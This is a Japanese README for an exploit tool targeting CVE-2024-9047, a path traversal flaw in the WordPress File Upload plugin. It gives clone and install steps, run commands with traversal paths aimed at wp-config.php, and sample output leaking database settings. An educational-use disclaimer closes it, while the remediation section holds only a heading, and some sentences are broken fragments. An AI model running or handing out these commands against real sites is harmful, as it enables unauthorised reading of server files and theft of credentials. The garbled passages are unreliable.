
WordPress File Upload Plugin 用エクスプロイト - 4.24.11 までの全バージョンに脆弱性があります。
WordPress 用の WordPress File Upload プラグインは、wfu_file_downloader.php ファイルを介して、バージョン 4.24.11 以前の全バージョンにおいて パストラバーサル (Path Traversal) の脆弱性の影響を受けます。この脆弱性により、認証されていない攻撃者が意図されたディレクトリの外部にあるファイルを読み取ったり削除したりできます。悪用を成功させるには、対象の WordPress インストールが PHP 7.4 以前 で実行されている必要があります。
攻撃者は、脆弱なエンドポイント wfu_file_downloader.php に対して特別に細工したリクエストを送信し、ファイルパスパラメータを操作することで、サーバー上の機密ファイルへの不正アクセスを取得できます。
4.24.11 以前)がインストールされている必要があります。7.4 以前で実行されている必要があります。このリポジトリをクローンします:
git clone https://github.com/Nxploited/CVE-2024-9047-Exploit.git
cd CVE-2024-9047-Exploit
Python の依存関係をインストールします(必要な場合):
pip install requests
スクリプトを実行してプラグインのバージョンを確認し、脆弱性を悪用します:
python3 CVE-2024-9047.py --url http://target-site.com --command /../../../../../path/to/target/file
デフォルトの脆弱な設定を悪用して WordPress の設定ファイルを読み取るには:
python3 CVE-2024-9047.py --url http://192.168.1.100 --command /../../../../../opt/lampp/htdocs/wordpress/wp-config.php
C:\Users\Nxploit\Desktop\-C>python CVE-2024-9047.py -u http://192.168.100.74:888/wordpress/
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );
/** Database username */
define( 'DB_USER', 'root' );
/** Database password */
define( 'DB_PASSWORD', '' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
WordPress サイトを保護するには:
このコードは教育および研究目的のみを意図しています。所有していない、またはテストする明示的な許可がないシステムでこのスクリプトを不正に使用することは、違法かつ非倫理的です。著者らは、このコードの誤用について一切の責任を負いません。